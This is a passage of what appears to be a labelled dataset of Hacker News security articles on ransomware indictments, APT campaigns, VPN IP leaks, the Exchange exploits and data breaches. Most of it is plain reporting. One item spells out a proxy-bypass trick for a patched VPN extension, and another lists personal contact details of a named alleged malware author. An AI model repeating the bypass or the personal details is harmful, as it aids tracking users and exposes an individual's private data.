bugs but with some fixes I was able to get shell on my test box."" Also accompanying the PoC's release is a detailed technical write-up by Praetorian researchers, who reverse-engineered CVE-2021-26855 to build a fully functioning end-to-end exploit by identifying differences between the vulnerable and patched versions. While the researchers deliberately decided to omit critical PoC components, the development has also raised concerns that the technical information could further accelerate the development of a working exploit, in turn triggering even more threat actors to launch their own attacks. As the sprawling hack's timeline slowly crystallizes, what's clear is that the surge of breaches against Exchange Server appears to have happened in two phases, with Hafnium using the chain of vulnerabilities to stealthily attack targets in a limited fashion, before other hackers began driving the frenzied scanning activity starting February 27. Cybersecurity journalist Brian Krebs attributed this to the prospect that ""different cybercriminal groups somehow learned of Microsoft's plans to ship fixes for the Exchange flaws a week earlier than they'd hoped."" ""The best advice to mitigate the vulnerabilities disclosed by Microsoft is to apply the relevant patches,"" Slowik said. ""However, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities to counter existing intrusions."" ",Vulnerability Warning – 3 Popular VPN Services Are Leaking Your IP Address,https://thehackernews.com/2018/03/vpn-leak-ip-address.html,"Researchers found critical vulnerabilities in three popular VPN services that could leak users' real IP addresses and other sensitive data. VPN, or Virtual Private Network, is a great way to protect your daily online activities that work by encrypting your data and boosting security, as well as useful to obscure your actual IP address. While some choose VPN services for online anonymity and data security, one major reason many people use VPN is to hide their real IP addresses to bypass online censorship and access websites that are blocked by their ISPs. But what if when the VPN you thought is protecting your privacy is actually leaking your sensitive data and real location? A team of three ethical hackers hired by privacy advocate firm VPN Mentor revealed that three popular VPN service providers—HotSpot Shield, PureVPN, and Zenmate—with millions of customers worldwide were found vulnerable to flaws that could compromise user's privacy. The team includes application security researcher Paulos Yibelo, an ethical hacker known by his alias 'File Descriptor' and works for Cure53, and whereas, the identity of third one has not been revealed on demand. PureVPN is the same company who lied to have a 'no log' policy, but a few months ago helped the FBI with logs that lead to the arrest of a Massachusetts man in a cyberstalking case. After a series of privacy tests on the three VPN services, the team found that all three VPN services are leaking their users' real IP addresses, which can be used to identify individual users and their actual location. Concerning consequences for end users, VPN Mentor explains that the vulnerabilities could ""allow governments, hostile organizations [sic], or individuals to identify the actual IP address of a user, even with the use of the VPNs."" The issues in ZenMate and PureVPN have not been disclosed since they haven't yet patched, while VPN Mentor says the issues discovered in ZenMate VPN were less severe than HotSpot Shield and PureVPN. The team found three separate vulnerabilities in AnchorFree's HotSpot Shield, which have been fixed by the company. Here's the list: Hijack all traffic (CVE-2018-7879) — This vulnerability resided in Hotspot Shield's Chrome extension and could have allowed remote hackers to hijack and redirect victim's web traffic to a malicious site. DNS leak (CVE-2018-7878) — DNS leak flaw in Hotspot Shield exposed users' original IP address to the DNS server, allowing ISPs to monitor and record their online activities. Real IP Address leak (CVE-2018-7880) — This flaw poses a privacy threat to users since hackers can track user's real location and the ISP. the issue occurred because the extension had a loose whitelist for ""direct connection."" Researchers found that any domain with localhost, e.g., localhost.foo.bar.com, and 'type=a1fproxyspeedtest' in the URL bypass the proxy and leaks real IP address. Here it must be noted that all the three vulnerabilities were in the HotSpot Shield's free Chrome plug-in, not in the desktop or smartphone apps. The researchers also reported similar vulnerabilities in the Chrome plugins of Zenmate and PureVPN, but for now, the details of the bugs are being kept under wraps since both the manufacturers have not yet fixed them. Researchers believe that most other VPN services also suffer from similar issues. ",Vulnerability Microsoft Says Russia Tried to Hack Three 2018 Midterm Election Candidates,https://thehackernews.com/2018/07/russia-election-hacking.html,"Microsoft said it detected and helped the US government to block Russian hacking attempts against at least three congressional candidates this year, a Microsoft executive revealed speaking at the Aspen Security Forum today. Although the company refused to name the targets but said, the three candidates were ""people who, because of their positions, might have been interesting targets from an espionage standpoint as well as an election disruption standpoint."" According to the company, the Russian hackers targeted the candidates' staffers with phishing attacks, redirecting them to a fake Microsoft website, in an attempt to steal their credentials. ""Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,"" said Tom Burt, Microsoft's vice president for customer security. ""And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections."" Immediately after learning of this incident, Microsoft took down the fake domain and worked with the government to ""avoid anybody being infected by that particular attack."" The company also ensured that none of the targeted campaign staffers were infected by the attack. Burt specified that the hacking attempts were conducted by a Russian hacking group, though so far the group has been less active compared to 2016, during the U.S. presidential election. Microsoft ""discovered that these [fake domains] were being registered by an activity group that at Microsoft we call Strontium...that's known as Fancy Bear or APT 28,"" Burt said. ""The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections,"" he added. For instance, Burt said the hackers are not infiltrating think tanks and targeting academia experts that they did during the 2016 presidential election. However, Burt warned that ""That does not mean we're not going to see it, there is a lot of time left before the election."" ",Cyber_Attack U.S Charges Two Iranian Hackers for SamSam Ransomware Attacks,https://thehackernews.com/2018/11/samsam-ransomware-iranian-hackers.html,"The Department of Justice announced Wednesday charges against two Iranian nationals for their involvement in creating and deploying the notorious SamSam ransomware. The alleged hackers, Faramarz Shahi Savandi, 34, and Mohammad Mehdi Shah, 27, have been charged on several counts of computer hacking and fraud charges, the indictment unsealed today at New Jersey court revealed. The duo used SamSam ransomware to extort over $6 million in ransom payments since 2015, and also caused more than $30 million in damages to over 200 victims, including hospitals, municipalities, and public institutions. According to the indictment, Savandi and Mansouri have been charged with a total of six counts, including one count of conspiracy to commit wire fraud, one count of conspiracy to commit fraud and related activity in connection with computers, two counts of intentional damage to a protected computer, and two counts of transmitting a demand in relation to damaging a protected computer. Since both hackers live in and operated from Iran, they have not yet been arrested by the United States authorities and the FBI has added them on their list of wanted hackers. According to the indictment, Savandi and Mansouri created the first version of the SamSam Ransomware in December 2015 and created further refined versions of the threat in June and October 2017. ""Defendants authored various versions of the SamSam Ransomware, which was designed to encrypt data on Victim computers. SamSam Ransomware was designed to maximize the damage caused to the Victim by, for instance, also encrypting backups of the targeted computers,"" the indictment says. ""Defendants used a variety of methods to gain access to Victim computer networks, including exploiting known security vulnerabilities in common server software and utilizing virtual private servers such as European VPS #1 and European VPS #2 to mask their identities."" Unlike most ransomware infections, SamSam was not distributed in an unplanned way via spam email campaigns. Instead, the attackers chose potential targets and infected systems manually. Attackers first compromised the RDP on a targeted system—either by conducting brute force attacks or using stolen credentials—and then attempted to strategically deploy SamSam throughout the network by exploiting vulnerabilities in other systems. Once on the entire network, SamSam encrypts the system's data and demands a huge ransom payment (usually more than $50,000 which is much higher than normal) in Bitcoin in exchange for the decryption keys. Since December 2015, SamSam has significantly targeted some large organizations, including the Atlanta city government, the Colorado Department of Transportation, several hospitals and educational institutions like the Mississippi Valley State University. ""According to the indictment, [affected victims includes] the City of Atlanta, the City of Newark, the Port of San Diego, the Colorado Department of Transportation, the University of Calgary, Hollywood Presbyterian Medical Centers, Kansas Heart Hospital, MedStar Health, Nebraska Orthopedic Hospital, and Allscripts Healthcare Solutions Inc."" The Atlanta city's officials refused to pay the ransomware, and the recovery effort cost them estimated $17 million. Leaving behind other well-known ransomware viruses like WannaCry and NotPetya, SamSam became the largest paid ransomware of its kind with one individual victim paid $64,000. Since Iran has no extradition policy with the United States, the indictment may not guarantee the extraditions or convictions of the two alleged hackers. But being on the wanted list of the FBI make it difficult for the duo to travel outside their country's boundary freely. ",Cyber_Attack Joomscan Security Scanner - Detect more than 550 Joomla vulnerabilities,https://thehackernews.com/2011/11/joomscan-security-scanner-detect-more.html,"Joomscan Security Scanner - Detect more than 550 Joomla vulnerabilities Joomscan Security Scanner updated recently with new database have 550 vulnerabilities. Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla web site. Last update for this tool was in August, 2009 with 466 vulnerabilities. How to Use Joomscan, read here. In joomscan you can check for new updates with command: ./joomscan.pl check or ./joomscan.pl update. Download for Windows (141 KB) Download for Linux (150 KB) More Info ",Vulnerability "Samsung Launches Bug Bounty Program — Offering up to $200,000 in Rewards",https://thehackernews.com/2017/09/samsung-bug-bounty-program.html,"With the growing number of cyber attacks and data breaches, a number of tech companies and organisations have started Bug Bounty programs for encouraging hackers, bug hunters and researchers to find and responsibly report bugs in their services and get rewarded. Samsung is the latest in the list of tech companies to launch a bug bounty program, announcing that the South Korean electronics giant will offer rewards of up to $200,000 to anyone who discovers vulnerabilities in its mobile devices and associated software. Dubbed Mobile Security Rewards Program, the newly-launched bug bounty program will cover 38 Samsung mobile devices released from 2016 onwards which currently receive monthly or quarterly security updates from the company. So, if you want to take part in the Samsung Mobile Security Rewards Program, you have these devices as your target—the Galaxy S, Galaxy Note, Galaxy A, Galaxy J, and the Galaxy Tab series, as well as Samsung's flagship devices, the S8, S8+, and Note 8. ""We take security and privacy issues very seriously; and as an appreciation for helping Samsung Mobile improve the security of our products and minimizing risk to our end-consumers, we are offering a rewards program for eligible security vulnerability reports,"" the company explains on its bug bounty website. ""We look forward to your continued interests and participations in our Samsung Mobile Security Rewards Program. Through this rewards program, we hope to build and maintain valuable relationships with researchers who coordinate disclosure of security issues with Samsung Mobile."" Not just mobile devices, the tech giant's Mobile Services suite is also part of its bug bounty program, which will also cover apps and services such as Bixby, Samsung Account, Samsung Pay, Samsung Pass, among others. For the eligibility of a reward, researchers and bug hunters need to provide a valid proof-of-concept (PoC) exploit that can compromise a Samsung handset without requiring any physical connection or third-party application. The company will evaluate the reward depending on the severity level of the vulnerability (Critical, High, Moderate, and Low) and its impact on devices. The least reward is $200, which is for low-severity flaws, while the highest reward is $200,000, which is for critical bugs. The Higher reward will be offered for bugs that lead to trusted execution environment (TEE) or Bootloader compromise. The level of severity will be determined by Samsung. Samsung's bounty of $200,000 is equal to the bounty reward offered under Apple's bug bounty program but is slightly lower than Microsoft's newly launched bounty program that offers $250,000 for Windows 10 security bugs. Following the path of major tech companies, the non-profit group behind Tor Project recently joined hands with HackerOne to launch its own bug bounty program, with the highest payout for the flaws has been kept $4,000. So, what you are waiting for? Hunt for bugs in Samsung products and submit your findings to the company via the Security Reporting page. ",Vulnerability More than 100 Pakistani Government Sites Under Malware attack,https://thehackernews.com/2011/11/more-than-100-pakistani-government.html,"More than 100 Pakistani Government Sites Under Malware attack Website Malware : A newer form of malware is what can be found attacking websites today. In the old days malware was mostly in the form of computer viruses. In today's age of globalization, malware starts to target websites and mobile devices. Almost 100's of Pakistan Government sites are under attack by Godzilla Malware, Which is Created and implemented by an Indian Hacker. Hacker named ""Godzilla"" publish a list of all Freezed sites list here ,including Peshawar Electric Supply Company website (www.pesco.gov.pk), Ministry of Information and Broadcasting - Government of Pakistan website (www.infopak.gov.pk), Pakistan Navy website (www.paknavy.gov.pk) and Many more. Hacker said,""The malware is freezing the sever and if the server is changed then banner of malware hits the live ip.."" Today malware is much more sinister. It is backed up by an industry which some estimate at $2 billion a year. It is all about making money. Get More Malware News on The Hacker News. ",Malware Chinese Hackers Steal Info from top secret U.S military data,https://thehackernews.com/2013/05/chinese-hackers-steal-info-from-top.html,"QinetiQ, a UK-based defense contractor suffers humiliation as intelligence officials confirmed that China was able to steal the U.S. classified documents and pertinent technological information all this because of QinetiQ's faulty decision-making. QinetiQ North America (QQ) a world leading defense technology and security company providing satellites, drones and software services to the U.S. Special Forces deployed in Afghanistan and Middle East. The hacking was so extensive that external consultants ended up more or less working permanently inside the firm to root out malicious software and compromises on an ongoing basis. In one of the attacks, that took place in 2009, the hackers raided at least 151 machines of the firm's Technology Solutions Group (TSG) over a 251-day period, stealing 20 gigabytes of data before being blocked. As the White House moves to confront China over its theft of U.S. technology through hacking, policy makers are faced with the question of how much damage has already been done. 1.3 million pages of documents, including ones containing highly sensitive military information, were stolen at the time. The agent had stumbled upon the breach as part of a separate investigation but apparently left out many key details including the fact that other contractors were being hit. Through 2008, is said to have treated the continuing pattern of hacks traced to its buildings as isolated incidents, including the compromise of 13,000 server passwords that attackers were used to help steal huge amounts of classified military engineering data. QinetiQ committed the first mistake as it restricts its investigation on the first discovery of the spying. Even when NASA warned the firm that it was being attacked by hackers from one of QinetiQ's computers the firm apparently continued to treat incidents in isolation. The hackers were able to exploit unpatched security flaws and other vulnerabilities across QNA to infiltrate multiple divisions of the company including Cyveillance, the company's cybersecurity unit. In 2010, HBGary, the security firm hacked in 2011 by Anonymous, was hired by QinetiQ along with Terremark to investigate the attacks. HBGary almost immediately identified malicious software on most of QinetiQ's computers. The spying on QinetiQ and other defense contractors appears aimed at helping China leapfrog the U.S.'s technologically advanced military, foregoing years of research and development that would have cost billions of dollars ",Vulnerability "Art of twitter account hacking, now or never !",https://thehackernews.com/2012/11/art-of-twitter-account-hacking-now-or.html,"Phishing is most commonly perpetrated through the mass distribution of e-mail messages directing users to a fraud web site or services. These professional criminals daily find new ways to commit old crimes, treating cyber crime like a business and forming global criminal communities. Another latest scam has been notified by GFI that, where cyber criminals are offering the art of hacking Twitter accounts with a web-based exploit. Phishers are sending scam emails and offering fake twitter account hacking service, which in actual will hack their own twitter accounts. Email from phishers have text, ""Do you want to learn how to hack twitter? Are you looking for a way to hack your friends twitter account without them finding out? Interested in finding out ways to hack someone's profile? Maybe you want to take a quick peek at their direct message inbox, steal their username or find a glitch to use a hacking script,"". Hackers try to convince readers by showing a exploit code, and explain that how exactly the hack will be performed. Here phisher actually trying to trick user by asking values of parameters used in exploit, such as Victim username, your twitter username and your twitter password (in order to show authenticity). Once reader will agree with the service in order to use it, they ask the end-user to email the above information to the site owner, along with fake code waffle as the subject line so ""the database knows how to read it in programming language."" Users have to be very careful and protect themselves from these threats by using appropriate security software and being aware of the tricks used by cyber criminals. In actual there is no such exploit or way which can hack twitter account of anyone by just one click, if it can then our... @TheHackersNews is open for you ! ",Malware Detecting Advanced Persistent Threat with Network Traffic Analysis,https://thehackernews.com/2012/10/detecting-advanced-persistent-threat.html,"A high degree of stealthiness over a prolonged duration of operation in order to do a successful cyber attack can be defined as Advanced Persistent Threat. The attack objectives therefore typically extend beyond immediate financial gain, and compromised systems continue to be of service even after key systems have been breached and initial goals reached. Today's successful targeted attacks use a combination of social engineering, malware, and backdoor activities. Nart Villeneuve and James Bennett (Senior Threat Researcher) from Trend Mirco provide an ultimate guide for Detecting (APT) Advanced Persistent Threat activities with Network Traffic Analysis, that can be used to identify malware command-and control (C&C) communications related to these attacks, illustrating how even the most high-profile and successful attacks of the past few years could have been discovered. Paper cover Detecting Remote Access Trojans like The GhostNet, Nitro attack, RSA Breach, Taidoor campaign, Sykipot campaign and more. Nart also talk about the Challenges during Network-Based Detection i.e Two key factors pose challenges to network-based detection encryption and the cloud. More than 90% of intrusions aren't even discovered by the victims themselves, but through third-party notification. In many cases, the APT has been on the victim network for months or even years, exfiltrating intellectual property data plus economic and political information. ""The ability to detect APT activity at the network level is heavily dependent on leveraging threat intelligence. A variety of very successful ongoing campaigns can be detected at the network level because their communications remain consistent over time."" To get rid of such attacks you much know that what that information is, where it resides, who has access to it, why they have access and when they access it. Answering these types of questions should give you a clearer picture of what are the most critical pieces in your infrastructure that need your attention. Modifications made to malware's network communications can, however, disrupt the ability to detect them. As such, the ongoing development of threat intelligence based on increased visibility and information sharing is critical to developing indicators used to detect such activity at the network level. For advance detection techniques based upon Protocol-aware detection, HTTP headers, Compressed archives, Timing and size you can read complete paper available here. ",Malware BlackPOS Malware used in TARGET Data Breach developed by 17-Year Old Russian Hacker,https://thehackernews.com/2014/01/BlackPOS-Malware-russian-hacker-Target.html,"The Holiday data breach at TARGET appeared to be part of a broad and highly sophisticated international hacking campaign against multiple retailers, involving the heist of possibly 110 million Credit-Debit cards, and personal information. Target confirmed last weekend that a malicious software was embedded in point-of-sale (POS) equipment at its checkout counters to collect secure data as the credit cards were swiped during transactions. The Malware called 'BlackPOS' also known as ""reedum"" or 'Kaptoxa' is an effective crimeware kit, that was created in March 2013 and available in underground sites for $1800-$2000. Investigators from IntelCrawler found a 17-years old hacker who actually developed the BlackPOS crimeware kit. His nickname is 'ree4' and original name: 'Sergey Taraspov' from St.Petersburg and Nizhniy Novgorod (Russian Federation). IntelCrawler's sources mentioned that the BlackPOS malware was created in March 2013 and first infected the Point-of-Sales environments in Australia, Canada and the US. Alleged Russian hacker and malware developer Sergey Taraspov (ree4) sold more than 40 builds of BlackPOS to cybercriminals from Eastern Europe and other countries. BlackPOS is a RAM-scraping malware totally written in VBScript i.e. It copies credit-card numbers from point-of-sale machines' RAM, in the instant after the cards are swiped and before the numbers are encrypted. In December, after the TARGET data breach, the Symantec antivirus firm discovered the malware and dubbed as 'Infostealer.Reedum.C'. 'He is a very well known programmer of malicious code in underground and previously he has created several tools used in hacking community for brute force attacks, such as ""Ree4 mail brute"", and also earned some first money with social networks accounts hacking and DDoS attacks trainings, as well as software development including malicious code.' More details about Sergey Taraspov (ree4): E-mail 1: ree4@list.ru E-mail 2: ree4@yandex.ru ICQ: 565033 Skype: s.r.a.ree4 Now any of his toolkit buyer is possibly the culprit behind the Target data breach. According to researchers, the attackers somehow managed hack one of the TARGET server and uploaded the POS malware to the checkout machines located at various stores. IntelCrawler didn't accuse him of the Target heist, but ""He is still visible for us, but the real bad actors responsible for the past attacks on retailers such as Target and Neiman Marcus were just his customers"". They said. ",Malware U.S. Trade Group Hacked by Chinese Hackers ahead of Trump-Xi Trade Summit,https://thehackernews.com/2017/04/hacking-trump-xi-trade.html,"Researchers have uncovered a Chinese cyber-espionage against the United States ahead of the trade summit on Thursday between US President Donald Trump and China's President Xi Jinping. According to a new report published today by Fidelis Cybersecurity firm, the Chinese APT10 hacking group implanted a piece of malware on the ""Events"" page of the US National Foreign Trade Council (NFTC) website in February. Dubbed 'Operation TradeSecret,' the attack against the NFTC site is seen as an attempt to conduct surveillance on the main industry players and lobbyists closely associated with U.S trade policy activities. Researchers say hackers placed a malicious link on the NFTC website, inviting the organization's board of directors to register for a meeting in Washington DC on March 7. But clicking on the link deployed a spying tool called ""Scanbox."" Dates back to 2014, Scanbox – previously used by nation-state threat actors associated with the Chinese government – has the ability to record the type and versions of software a victim is running and run keyloggers on compromised computers, said Fidelis researcher John Bambenek. ""This attack was really at its core a reconnaissance attack. Anyone who visited this calendar entry would expose their software versions and use a JavaScript keylogger that could expose their identity,"" said Bambenek. ""Traditionally these attacks are used to precisely identify targets and help them craft targeted phishing attacks using exploits they know the victim is vulnerable to."" The malicious link was active on the NFTC website between February 27 and March 1. The malware was already removed from the site by the time Fidelis contacted NFTC. The NFTC's staff and board represent many influential people and companies -- from President Rufus Yerxa, the U.S. Ambassador to GATT to executives from major companies including Google, Amazon, eBay, IBM, Coca-Cola, Microsoft, Oracle, Cisco, KPMG, Pfizer, Visa, Ford, Halliburton, and Walmart. Although Fidelis detected no further attacks on NFTC board members, the security firm believed the hackers were after a full range of entities relevant to the trade negotiations due to take place Thursday between US and China. This is the second time in a week when APT10 cyber espionage campaign has come to light. A report released this week by BAE Systems, and PwC also claimed that APT10 was targeting managed IT services providers (MSPs) and their customers across the globe to steal sensitive data. ",Cyber_Attack Call for Articles - July Edition | The Hacker News Monthly Magazine,https://thehackernews.com/2012/06/call-for-articles-july-edition-hacker.html,"Call for Articles - July Edition | The Hacker News Monthly Magazine Attention Readers!! We know there is a writer in all of you and we invite you to submit your best work on the subject of BOTNETS for our July The Hacker News Monthly Magazine. Give us all your expertise and knowledge on the subject and we will give it a top priority! We'd like to thank our readers and supporters and know that we take your loyalty seriously and with great appreciation. See you in July! Ann Smith Executive Editor, The Hacker News ",Malware FBI warns that Anonymous Hackers has been hacking US Government for almost a year,https://thehackernews.com/2013/11/fbi-warns-that-anonymous-hackers-has.html,"The FBI is warning that members of the hacktivist group Anonymous hacking collective have secretly accessed US Government computers and stolen sensitive information in a campaign that began almost a year ago. The Hacktivists have exploited a flaw in Adobe applications to compromise the target systems and install software backdoors to maintain the control of the victims computers over the time, the facts dated back to last December, according to a Reuters report. The hacking campaign affected the U.S. Army, Department of Energy, Department of Health and Human Services, and other government agencies, FBI reveals. The Federal Bureau of Investigation memo called the hacking campaign ""a widespread problem that should be addressed."" and provided useful information for system administrators that how to determine if their networks were compromised. Government investigators are investigating the scope of the hacking, believed that hackers are still operating under coverage. ""According to an internal email from Energy Secretary Ernest Moniz' chief of staff, Kevin Knobloch, the stolen data included personal information on at least 104,000 employees, contractors, family members and others associated with the Department of Energy, along with information on almost 2,0000 bank accounts. The email, dated October 11, said officials were ""very concerned"" that loss of the banking information could lead to thieving attempts."" states Reuters post. It seems that the hacking campaign was linked to the case of Lauri Love, a British resident indicted on October 28 for allegedly breaking into computers at the Department of Energy, Army, Department of Health and Human Services, the U.S. Sentencing Commission and elsewhere. Law enforcement sustains that attacks began when Love and other members of the group of hacktivists exploited a security flaw in Adobe's ColdFusion application, of course Adobe spokeswoman declined any responsibility and declared that similar attacks are possible only if targeted systems are not updated with the latest security patches. Law enforcement confirmed that some of the stolen information on the latest campaign had previously been disclosed by Anonymous members during the ""Operation Last Resort."" Despite the earlier disclosures, ""the majority of the intrusions have not yet been made publicly known,"" ""It is unknown exactly how many systems have been compromised, but it is a widespread problem that should be addressed."" the FBI wrote. The cyber espionage campaigns conducted by Anonymous are the reply to the arrests of popular hackers linked to the collective linked to US retaliation strategy against hackers. Consider hacktivism a transitory phenomena are dangerous, underestimate the capabilities of groups like Anonymous is a serious error and the FBI memo is an important warning for Governments and IT community ... Anonymous is alive and could hit every target in every moment! ",Cyber_Attack Capital One Hacker Also Accused of Hacking 30 More Companies and CryptoJacking,https://thehackernews.com/2019/08/paige-thompson-capital-one.html,"Former Amazon employee Paige Thompson, who was arrested last month in relation to the Capital One data breach, has been accused of hacking not only the U.S. credit card issuer, but also more than 30 other companies. An indictment unsealed on Wednesday revealed that Thompson not just stole data from misconfigured servers hosted with a cloud-computing company, but also used the computing power of hacked servers to mine for cryptocurrency, a practice commonly known as ""Cryptojacking."" Thompson, known online as ""erratic,"" was arrested by the FBI on July 29 concerning a massive breach in Capital One Financial Corp that exposed the personal information of more than 100 million credit card applicants in the United States and 6 million in Canada. The stolen data included approximately 140,000 Social Security numbers and 80,000 bank account numbers linked to United States customers, and 1 million Social Insurance numbers belonged to Canadian citizens, along with some customers' names, addresses, dates of birth, credit scores, credit limits, balances, payment history, and contact information. Law enforcement became aware of Thompson's activity after she posted information relating to her theft of Capital One data on her GitHub account. However, a federal grand jury yesterday charged Thompson with a total of two counts—one count of wire fraud and one count of computer fraud and abuse—for illicitly accessing data on more than 30 other entities, including Capital One, U.S. Department of Justice (DOJ) said. While the indictment [PDF] did not name the involved cloud-computing company, it's highly likely to be Amazon as Thompson previously worked for Amazon Web Services, which provides cloud computing services to Capital One among others. But it should also be noted that Amazon Web Services was not compromised in any way since Thompson gained access to the cloud server due to Capital One's misconfiguration and not through a vulnerability in Amazon's infrastructure. The indictment also did not provide names of the other 30 victims, but it did describe three of the targeted organizations as a state agency outside the State of Washington, a telecommunications conglomerate outside the U.S. and a public research university outside the State of Washington. Investigators have found no evidence of Thompson selling or disseminating any of the stolen information. The 33-year-old Seattle-based software engineer remains in custody and is scheduled to be arraigned on the indictment in U.S. District Court in Seattle on September 5. She could face up to 25 years in prison if convicted. ",Cyber_Attack German Researchers Break RFID Smartcard Encryption,https://thehackernews.com/2011/10/german-researchers-break-rfid-smartcard.html,"German Researchers Break RFID Smartcard Encryption Scientists have found a way to circumvent the encryption used to protect a smartcard used to restrict access to buildings and to process public transit system payments. A team of German scientists have demonstrated a hack that lets them make a perfect clone of the kind of magnetic security card used to give access to workers in corporate or government buildings -- including NASA -- and as a daily ticket replacement on buses and subways. The same team broke a previous version of contactless-ID cards from Mifare in 2008. This prompted the company to upgrade its security to create a card able to be programmed only once and which contained a unique identifying number that could be checked against the programmed content on the card for extra security. The new hack is carried out using a side channel attack, which bypasses the defensive features intended to prevent attacks on the card. To achieve this, the researchers made repeated measurements of electricity consumption during encryption and decryption. This can be determined by measuring the magnetic field close to the card. ",Vulnerability "Hackers leak 13,000 Passwords Of Amazon, Walmart and Brazzers Users",https://thehackernews.com/2014/12/password-hacking-data-breach.html,"Hackers claiming affiliation with the hacktivist group ""Anonymous"" have allegedly leaked more than 13,000 username and password combinations for some of the worlds most popular websites, including Amazon, Xbox Live and Playstation Network. The stolen personal information was released in a massive text document posted to the Internet file-sharing website Ghostbin (now deleted), on Friday. The document contains a huge number of usernames and passwords, along with credit card numbers and expiration dates. The news came just a day after the hacker group Lizard Squad compromised Sony's Playstation and Microsoft's Xbox Live gaming networks on Christmas day, which is estimated to have affected Xbox's 48 million subscribers and PlayStation's 110 million users, making it a total of more than 150 million users worldwide. However, data breach of 13,000 users is not the biggest data breach we've ever seen. When millions of passwords are used for sites around the globe, chances are very minor that our's among those compromised. But still it's important to note as these accounts come from a variety of online sources and among those, some are really very popular. The Daily Dot's Aaron Sankin has compiled a comprehensive list of sites associated with the username and password leaks, and discovered that the leaks came from the sites run the gamut from pornography to gaming to online shopping. The list of the compromised websites is as follows: Amazon Walmart PlayStation Network Xbox Live Twitch.tv Dell Brazzers DigitalPlayground and see complete list. Just to be on a safer side, users are recommended to change their passwords if they have accounts on these compromised websites, and also pay attention to your credit card transactions and if any suspicious activity found, immediately communicate with related banks and financial institutions. Also, don't use the same passwords for banking and online shopping sites, and always keep an eye out for unusual activities or unauthorized purchases with your accounts. ",Data_Breaches LOCKER Malware - Yet another new variant of Cryptolocker Ransomware,https://thehackernews.com/2013/12/locker-malware-yet-another-new-variant.html,"Ransomware, a threat to internet users that continues to grow in popularity with cyber criminals due to its success and monetary potential. This is nothing new and to be expected. I have noticed many discussions on underground hacking forums about ""How to create Ransomware like Cryptolocker malware"" or ""Malware - hacking tool-kit with ransomware features"". Security intelligence provider, IntelCrawler has discovered a new ransomware variant called Locker that demands $150 (£92) to restore files that it has encrypted. Like Cryptolocker, this new ransomware is also nasty because infected users are in danger of losing their personal files forever. Locker mainly spreads by drive-by downloads from compromised websites, disguised itself as MP3 files and use system software vulnerabilities to infect the end user. Once it has infected a system, malware first checks the infected machine has an internet connection or not. Then it deletes any original files from the victim's computer after using AES-CTR for encrypting the files on infected devices and add "". perfect"" extension to them. Locker's encryption is based on an open source tool called 'TurboPower LockBox' library. After encrypting all files, the malware place a ""CONTACT.TXT"" file in each directory, which provides contact details of the author to buy the decryption key and once the ransom is paid, each victim gets a key to unscramble files. The good news is that the researchers are working on the universal decryption software in order to help the victims. ""It appears that the hackers are simply comparing the list of infected IP addresses of users, along with their host names,"" according IntelCrawler. IntelCrawler had discovered 50 different builds of the malware, which are being sold in underground markets for pay-per install programs. One builds had just under 6,000 infected machines. ZdNet reported. Malware will encrypt all drives visible on an infected system, so you must be sure that your backups are stored remotely or in a location that is not simply another drive partition or mapping to another location. The malware infects users from the United States, Turkey, Russia, Germany and the Netherlands. Users should remain vigilant about their security. Please double check the legitimacy of links received in emails and ensure you have your antivirus up to date to help protect against such threats. ",Vulnerability Warning : Java 6 vulnerable to zero-day exploit; added to Neutrino exploit kit,https://thehackernews.com/2013/08/Java-6-zero-day-Neutrino-exploit-kit.html,"Hackers are using a new exploit for a bug in the out-of-date but popular Java 6 platform to attack victims, and has been added to a commercially available Neutrino exploit kit. The use of Java 6 still is prevalent, opening up a significant number of users to the threat. F-secure analyst Timo Hirvonen warned about the exploit over Twitter, advising that he had found an exploit in the wild actively targeting an unpatched vulnerability in Java 6, named CVE-2013-2463. The exploit's proof-of-concept was made public last week, prior to in-the-wild attacks surfacing on Monday. Oracle is aware of the hole but, since Java 6 is no longer supported, the company will not patch the issue. The vulnerability lies in Java Runtime Environment's 2D sub-component, which is used to make two-dimensional graphics. Because no patch is available, the exploits provides cybercriminals and other attackers an effective vehicle to launch attacks targeting users and organizations using Java 6. The Neutrino crimeware kit was first spotted in March 2013, when it was identified as the source of a series of attacks that were exploiting Java vulnerabilities to install ransomware on victims' PCs, freezing them until users paid a fine that was supposedly being levied by the FBI and other law enforcement agencies. The impact of this threat may be less for usual Internet users than for organizations/entities, who may not be quick to migrate to the latest software version due to business and/or operational continuity issues. Users should update their Java installations to the latest revision of version 7, which does not suffer from the issue. Users who don't need Java in their everyday tasks should uninstall the software altogether. ",Malware New Critical Oracle WebLogic Flaw Under Active Attack — Patch Now,https://thehackernews.com/2019/06/oracle-weblogic-vulnerability.html,"Oracle has released an out-of-band emergency software update to patch a newly discovered critical vulnerability in the WebLogic Server. According to Oracle, the vulnerability—which can be identified as CVE-2019-2729 and has a CVSS score of 9.8 out of 10—is already being exploited in the wild by an unnamed group of attackers. Oracle WebLogic is a Java-based multi-tier enterprise application server that allows businesses to quickly deploy new products and services on the cloud, which is popular across both, cloud environment and conventional environments. The reported vulnerability is a deserialization issue via XMLDecoder in Oracle WebLogic Server Web Services that could allow unauthorized remote attackers to execute arbitrary code on the targeted servers and take control over them. ""This remote code execution vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password,"" the advisory said. In a separate note, the company also revealed that the flaw is related to a previously known deserialization vulnerability (CVE-2019-2725) in Oracle WebLogic Server that it patched in April this year. The previously patched RCE flaw in Oracle WebLogic was also exploited by attackers as a zero-day i.e., to distribute Sodinokibi ransomware and cryptocurrency mining malware. Reported independently by a separate group of individuals and organizations, the new vulnerability affects Oracle WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0, and 12.2.1.3.0 Due to the severity of this vulnerability, the company has recommended affected users and companies to install available security updates as soon as possible. Other Important Security Updates from Oracle Besides this, Cisco today also released several other software updates for various of its products that to addresses some critical and high severity vulnerabilities. Cisco TelePresence — a video conferencing system by Cisco, the software contains a high severity vulnerability that could allow remote attackers to execute arbitrary shell commands or scripts on the targeted device just by sending crafted CDP packets to an affected device. Cisco SD-WAN Solution — The vManage web-based interface of the software-defined WAN solutions by Cisco contains three flaws, two of which have been rated high in severity, and one is critical. Two of these allow an attacker to elevate his privileges to the root user, whereas one flaw could allow an authenticated, remote attacker to execute 